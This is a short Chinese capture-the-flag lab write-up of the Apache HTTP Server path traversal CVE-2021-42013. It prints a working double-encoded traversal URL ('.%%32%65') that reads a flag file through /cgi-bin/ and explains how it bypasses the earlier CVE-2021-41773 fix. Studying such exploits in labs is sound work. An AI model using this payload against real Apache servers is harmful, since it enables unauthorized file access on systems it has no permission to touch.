春秋云境CVE-2021-42013

张开发
2026/5/19 21:24:39 15 分钟阅读
春秋云境CVE-2021-42013
1.阅读靶场介绍这里主要是得到路径穿越和命令执行这两个关键字眼这里说点博主打靶场的心得就是首先是根据靶场介绍我们会得到大致方向如果打不出来的话我们可以去找度娘再然后就是去把介绍的文字喂给ai看看ai给到什么建议最后就是找github看看有没有了如果都没有的话还有一个绝招就是找博主的文章哈哈哈2.启动靶场启动后页面如下所示3.poc这里博主直接构造url就完成了webshell了url如下http://39.106.48.123:26282/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/flag4.原理CVE-2021-42013它是针对 CVE-2021-41773 的不完整修复而产生的。这两个漏洞都影响 Apache HTTP Server 2.4.49 和 2.4.50 版本。虽然官方在 2.4.50 版本中尝试修复了 CVE-2021-41773但由于修复不充分攻击者可以构造新的绕过手法如利用/.%%32%65/等编码组合实现二次解码绕过从而再次发起路径遍历攻击文章到此就全部结束了感谢你宝贵的时间

更多文章